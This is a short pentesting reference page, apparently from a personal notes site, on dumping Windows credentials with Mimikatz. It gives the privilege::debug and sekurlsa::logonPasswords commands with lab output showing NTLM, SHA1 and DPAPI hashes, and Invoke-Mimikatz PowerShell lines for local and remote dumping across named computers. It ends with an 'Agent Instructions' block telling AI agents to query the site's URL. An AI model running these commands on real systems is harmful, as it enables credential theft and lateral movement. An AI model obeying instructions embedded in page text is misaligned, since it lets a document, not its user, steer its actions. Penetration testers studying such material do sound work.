# Mimikatz
{% embed url="" %}
### Credentials Dumping with Mimikatz
Set privilege mode to debug (After running it as admin)
```
C:\Users\pparker\Downloads\mimikatz_trunk\x64>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
```
Checking available modules
```
mimikatz # sekurlsa::
ERROR mimikatz_doLocal ; "(null)" command of "sekurlsa" module not found !
Module : sekurlsa
Full name : SekurLSA module
Description : Some commands to enumerate credentials...
msv - Lists LM & NTLM credentials
wdigest - Lists WDigest credentials
kerberos - Lists Kerberos credentials
tspkg - Lists TsPkg credentials
livessp - Lists LiveSSP credentials
cloudap - Lists CloudAp credentials
ssp - Lists SSP credentials
logonPasswords - Lists all available providers credentials
process - Switch (or reinit) to LSASS process context
minidump - Switch (or reinit) to LSASS minidump context
bootkey - Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials
pth - Pass-the-hash
krbtgt - krbtgt!
dpapisystem - DPAPI_SYSTEM secret
trust - Antisocial
backupkeys - Preferred Backup Master keys
tickets - List Kerberos tickets
ekeys - List Kerberos Encryption Keys
dpapi - List Cached MasterKeys
credman - List Credentials Manager
```
See logon passwords
```
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 426939 (00000000:000683bb)
Session : Interactive from 1
User Name : pparker
Domain : MARVEL
Logon Server : HYDRA-DC
Logon Time : 5/26/2025 10:25:53 PM
SID : S-1-5-21-817282392-3664699690-768258319-1106
msv :
[00000003] Primary
* Username : pparker
* Domain : MARVEL
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 220a3e34eaf9b45b4bc0f153f861610b
tspkg :
wdigest :
* Username : pparker
* Domain : MARVEL
* Password : (null)
kerberos :
* Username : pparker
* Domain : MARVEL.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 426917 (00000000:000683a5)
Session : Interactive from 1
User Name : pparker
Domain : MARVEL
Logon Server : HYDRA-DC
Logon Time : 5/26/2025 10:25:53 PM
SID : S-1-5-21-817282392-3664699690-768258319-1106
msv :
[00000003] Primary
* Username : pparker
* Domain : MARVEL
* NTLM : 64f12cddaa88057e06a81b54e73b949b
* SHA1 : cba4e545b7ec918129725154b29f055e4cd5aea8
* DPAPI : 220a3e34eaf9b45b4bc0f153f861610b
tspkg :
wdigest :
* Username : pparker
* Domain : MARVEL
* Password : (null)
kerberos :
* Username : pparker
* Domain : MARVEL.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
```
### Mimikatz Powershell
You need admin priveleges
```
..\Invoke-Mimikatz.ps1
dumpping credentials
Invoke-Mimikatz -DumpCreds -Verbose
Invoke-Mimikatz –DumpCreds –ComputerName @(“comp1”,”comp2”)
```
Remote Dumping Credentials
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://notes.cavementech.com/pentesting-quick-reference/brute-forcing-password-cracking/mimikatz.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.